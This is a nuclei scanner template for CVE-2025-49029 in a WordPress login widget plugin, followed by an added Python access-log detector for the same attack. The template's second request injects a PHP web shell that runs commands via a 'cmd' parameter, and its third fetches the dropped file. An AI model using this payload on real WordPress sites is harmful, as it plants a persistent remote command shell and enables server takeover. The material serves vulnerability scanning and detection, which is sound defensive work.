id: CVE-2025-49029

info:
  name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection. This issue affects Custom Login And Signup Widget: from n/a through 1.0.
  impact: |
    Authenticated administrators can inject arbitrary PHP code through the plugin settings, potentially achieving remote code execution on the WordPress server.
  remediation: |
    Upgrade the Custom Login And Signup Widget plugin to a version later than 1.0 that properly validates and sanitizes the settings input.
  reference:
    - https://github.com/Nxploited/CVE-2025-49029
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-login-and-signup-widget/custom-login-and-signup-widget-10-authenticated-administrator-remote-code-execution
  classification:
    epss-score: 0.02122
    epss-percentile: 0.79573
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/custom-login-and-signup-widget/"
    fofa-query: body="/wp-content/plugins/custom-login-and-signup-widget/"
  tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login,file-upload,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}

        text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

      - |
        GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_2, "custom-login-and-signup-widget")
          - status_code_3 == 500
        condition: and
# digest: 4a0a00473045022100cf9943ae2076b33000e9fdebda71c774104db9e9b303368176ad38b11f33cd1a022028ad8c3ca2ab8831e9c32a4664938aea6ac32c8501c352be1bcd180e71027b87:922c64590222798bb761d5b6d8e72950
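The template above is an attacker-side check. The defender-side counterpart, added here as an example and not part of the template or the referenced PoC, is a small access-log detector for the same three-step sequence: a POST to the plugin settings page with `editbn1=yes` (the write that persists the injected PHP), followed by a request for `content/sn.php` from the same client. The endpoint paths are taken from the template's requests; the log lines are constructed, the Combined Log Format parsing is an assumption about the server, and the `cmd` parameter is only the template's payload choice (an attacker can name it anything), so correlation keys on the settings write rather than on that name. Request bodies are not logged, so the injected PHP itself is never visible in the log, only the query string is.

```python
"""Detect CVE-2025-49029 exploitation attempts in web server access logs.

Added example, not part of the nuclei template or the referenced PoC. The
endpoint paths are taken from the template's three requests; the sample log
lines below are constructed for illustration. Logs are assumed to be in
Apache/nginx Combined Log Format (the request body is never logged, so the
injected PHP itself is not visible; the query string is).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable
from urllib.parse import parse_qs, urlparse

# Endpoints from the template: the settings write that persists the injected
# code, and the PHP file the template then fetches.
SETTINGS_PATH = "/wp-admin/options-general.php"
SETTINGS_PAGE = "custom-login-and-signup-widget"
DROPPED_FILE = "/wp-content/plugins/custom-login-and-signup-widget/content/sn.php"

# Combined Log Format: client ident user [time] "METHOD url HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)


@dataclass(frozen=True)
class Finding:
    ip: str
    stage: str  # "settings_write", "webshell_exec" or "dropped_file_probe"
    ts: str
    url: str


def detect(lines: Iterable[str]) -> list[Finding]:
    """Return one Finding per suspicious request, in log order."""
    findings: list[Finding] = []
    writers: set[str] = set()  # clients that already hit the vulnerable settings write
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        ip, ts, method, url = m["ip"], m["ts"], m["method"], m["url"]
        parsed = urlparse(url)
        qs = parse_qs(parsed.query, keep_blank_values=True)

        # Stage 1: POST to the plugin settings page with editbn1=yes. A GET of
        # the same page is a normal admin view and is not flagged.
        if (method == "POST" and parsed.path == SETTINGS_PATH
                and qs.get("page") == [SETTINGS_PAGE]
                and qs.get("editbn1") == ["yes"]):
            writers.add(ip)
            findings.append(Finding(ip, "settings_write", ts, url))
            continue

        # Stage 2: any request for the file the injected PHP lands in. "cmd" is
        # only the template's parameter name (attacker-controlled), so a request
        # from a client that already did stage 1 counts as execution without it.
        if parsed.path == DROPPED_FILE:
            stage = "webshell_exec" if ("cmd" in qs or ip in writers) else "dropped_file_probe"
            findings.append(Finding(ip, stage, ts, url))
    return findings


def correlated_ips(findings: Iterable[Finding]) -> set[str]:
    """Clients that both performed the settings write and then hit sn.php."""
    wrote = {f.ip for f in findings if f.stage == "settings_write"}
    ran = {f.ip for f in findings if f.stage == "webshell_exec"}
    return wrote & ran


# Constructed sample log (not real traffic): one attacker session mirroring the
# template's three requests, plus a benign admin viewing the settings page.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2025:12:00:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "nuclei"
203.0.113.7 - - [10/Jun/2025:12:00:02 +0000] "POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1" 200 5120 "https://wp.example/wp-admin/options-general.php?page=custom-login-and-signup-widget" "nuclei"
203.0.113.7 - - [10/Jun/2025:12:00:03 +0000] "GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id HTTP/1.1" 200 61 "-" "curl/8.0"
198.51.100.5 - - [10/Jun/2025:12:05:00 +0000] "GET /wp-admin/options-general.php?page=custom-login-and-signup-widget HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    results = detect(SAMPLE_LOG.splitlines())
    for f in results:
        print(f"{f.ts} {f.ip} {f.stage:18} {f.url}")
    print("correlated:", sorted(correlated_ips(results)))
```

Run against the constructed sample, the benign admin GET produces nothing, the attacker's settings POST and the follow-up `sn.php?cmd=id` are reported as two findings, and `correlated_ips` returns that single client. A lone request for `sn.php` without a preceding settings write from the same address is reported as a probe only, since the template's own third request is exactly that and is indistinguishable from a scanner.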